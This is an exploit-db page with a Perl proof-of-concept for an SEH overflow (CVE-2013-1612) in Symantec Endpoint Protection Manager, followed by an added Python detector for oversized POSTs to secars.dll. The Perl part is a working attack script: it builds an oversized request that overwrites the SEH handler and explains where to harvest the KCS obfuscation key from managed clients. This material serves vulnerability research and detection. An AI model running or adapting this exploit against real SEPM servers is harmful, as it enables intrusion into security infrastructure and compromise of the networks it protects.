Symantec Endpoint Protection Manager 12.1.x - Overflow (SEH) (PoC)

Published 27 Apr 2014, reported by st3n. Source: exploitdb (www.exploit-db.com)

Symantec Endpoint Protection Manager 12.1.x - Overflow (SEH) (PoC) - Exploit Code for SEPM 12.1.x Overflo

Code
# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33056-sepm-secars-poc-v0.3.tar.gz

#!/usr/bin/perl -w
# Exploit Title: Symantec Endpoint Protection Manager 12.1.x - SEH Overflow POC
# Date: 31 January 2013
# Exploit Author: [email protected] (a.k.a. [email protected])
# Vendor Homepage: http://http://www.symantec.com/en/uk/endpoint-protection
# Version: 12.1.0 -> 12.1.2
# Tested on: Windows 2003 Enterprise Edition SP2
# CVE : CVE-2013-1612
# More info on: http://funoverip.net/?p=1693
#
#=====================================================================================
#
# This POC code overwrites EIP with "CCCCCCCC".
#
# About the KCS key: that key is used to obfuscate traffic between client and server.
#                    The key is generated during SEPM installation.
#                    We need that key to talk to the SEPM server.
#
# Where to find the KCS key?
# On a managed client station, search for "Kcs" inside:
#
# - Win7/Vista/W2k8/and more : 
#    C:\\ProgramData\\Symantec\\Symantec Endpoint Protection\\CurrentVersion\\Data\\Config\\SyLink.xml
# - Windows XP :
#    C:\\Document & Settings\\All Users\\Application Data\\Symantec\\Symantec Endpoint Protection\\
#    CurrentVersion\\Data\\Config\\SyLink.xml 
#
# On server side, check the logs:
#    C:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection Manager\\data\\inbox\\log\\ersecreg.log
#=====================================================================================

use warnings;
use strict;
use IO::Socket::INET;
use SEPM::SEPM;


# SEP Manager host/ip
my $host        = "192.168.60.186";
my $port        = 8014;

# Kcs key
my $Kcs_hex     = "85FB05B288B45D92447A3EDCBEFC434E";

# ---- config end -----




# flush after every write
$| = 1;


# Send HTTP request function
sub send_request {
    my $param     = shift;  # URL parameters
    my $post_data = shift;  # POST data
    my $sock = IO::Socket::INET->new("$host:$port");
    if ($sock) {
        print "Connected.. \n";

        # HTTP request
        my $req =
            "POST /secars/secars.dll?h=$param HTTP/1.0\r\n" .
            "User-Agent: Smc\r\n" .
            "Host: $host\r\n" .
            "Content-Length: " . length($post_data) . "\r\n" .
            "\r\n" .
            $post_data;

        # Sending
        print $sock $req;

        # Read HTTP response
        my $resp = '';
        while (<$sock>) { $resp .= $_; }

        #print $resp;
        if ($resp =~ /400 Bad Request/) {
            print "\nERROR: Got '400 Bad Request' from the server. Wrong Kcs key? Wrong SEP version?\n";
        }

        close $sock;
    }
    else {
        # Connection failures were previously silent; report them
        print "ERROR: could not connect to $host:$port: $!\n";
    }
}


# SEP object
my $sep = SEPM::SEPM->new();


print "[*] Target: $host:$port\n";
print "[*] KCS Key: $Kcs_hex\n";

# SEPM object for obfuscation
print "[*] Generating master encryption key\n";
$sep->genkey($Kcs_hex);

# Obfuscate URL parameters 
print "[*] Encrypting URI\n";
my $h = $sep->obfuscate("l=9&action=26");

# The evil buff
print "[*] Building evil buffer\n";
my $buf =
    "foo=[hex]" .   # [hex] calls the vulnerable parsing function
    "F" x 1288 .    # Junk
    "B" x 8 .       # Pointer to next SEH record
    "CCCCCCCC" .    # SEH handler, will overwrite EIP register
    "D" x 500;      # Trigger "Memory Access Violation" exception


# Sending request
print "[*] Sending HTTP request\n";
send_request($h,     # URL parameters
             $buf    # post data        
);


print "[*] Done\n";
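The PoC above works by sending a POST to `/secars/secars.dll` whose body is far larger than a legitimate client check-in. From a defender's side, that shape is easy to spot in raw HTTP traffic captured by a reverse proxy or IDS in front of SEPM. The following Python is an added example written for this page; it is not part of the exploit-db entry or of Symantec's software. The size threshold, the `sepm.example` host name and the sample requests are constructed assumptions, and the `[hex]` marker and the `Smc` user agent are taken from the PoC itself.

```python
"""Flag oversized or inconsistent POST requests to the SEPM secars.dll endpoint.

Added detection example (not from the exploit-db entry). It parses raw
HTTP/1.x request bytes and alerts when a POST to /secars/secars.dll has a
body larger than a configured limit, or when the declared Content-Length
does not match the body actually received.
"""
import re
from typing import Dict, Optional, Tuple

SECARS_PATH = "/secars/secars.dll"
MAX_SECARS_BODY = 1024  # assumption: constructed threshold, tune per environment

_REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/1\.[01]$")


def parse_request(raw: bytes) -> Optional[Dict[str, object]]:
    """Split a raw HTTP/1.x request into method, path, headers and body.

    Returns None when the request line is malformed or the header block
    is not terminated by a blank line.
    """
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return None
    lines = head.decode("latin-1").split("\r\n")
    m = _REQUEST_LINE.match(lines[0])
    if not m:
        return None
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if colon:
            headers[name.strip().lower()] = value.strip()
    return {
        "method": m.group("method"),
        # strip the obfuscated ?h=... query so the path compares cleanly
        "path": m.group("target").split("?", 1)[0],
        "headers": headers,
        "body": body,
    }


def classify(raw: bytes) -> Tuple[str, str]:
    """Return ("alert", reason) or ("ok", reason) for one raw request."""
    req = parse_request(raw)
    if req is None:
        return ("alert", "malformed request line or missing header terminator")
    if req["method"] != "POST" or str(req["path"]).lower() != SECARS_PATH:
        return ("ok", "not a secars POST")
    headers = req["headers"]
    body = req["body"]
    try:
        declared = int(headers.get("content-length", "0"))
    except ValueError:
        return ("alert", "non-numeric Content-Length")
    if declared != len(body):
        return ("alert", f"Content-Length {declared} does not match {len(body)}-byte body")
    if len(body) > MAX_SECARS_BODY:
        return ("alert", f"secars POST body of {len(body)} bytes exceeds {MAX_SECARS_BODY}")
    return ("ok", f"secars POST body of {len(body)} bytes within limit")


def _build(target: str, body: bytes, user_agent: str = "Smc") -> bytes:
    """Assemble a constructed HTTP/1.0 request in the shape the SEP client uses."""
    head = (f"POST {target} HTTP/1.0\r\n"
            f"User-Agent: {user_agent}\r\n"
            f"Host: sepm.example\r\n"
            f"Content-Length: {len(body)}\r\n\r\n")
    return head.encode("latin-1") + body


# Constructed samples: a small check-in and an oversized body like the PoC sends
BENIGN = _build("/secars/secars.dll?h=deadbeef", b"foo=[hex]" + b"A" * 64)
OVERSIZED = _build("/secars/secars.dll?h=deadbeef", b"foo=[hex]" + b"X" * 1800)
MISMATCH = BENIGN.replace(b"Content-Length: 73", b"Content-Length: 10")

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("oversized", OVERSIZED), ("mismatch", MISMATCH)):
        verdict, reason = classify(sample)
        print(f"{label:10s} {verdict:6s} {reason}")
```

The body-size check is the signal that matters for this bug; the Content-Length comparison is there because a proxy that trusts the declared length can be fed a truncated or padded body and log something other than what the backend parsed.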
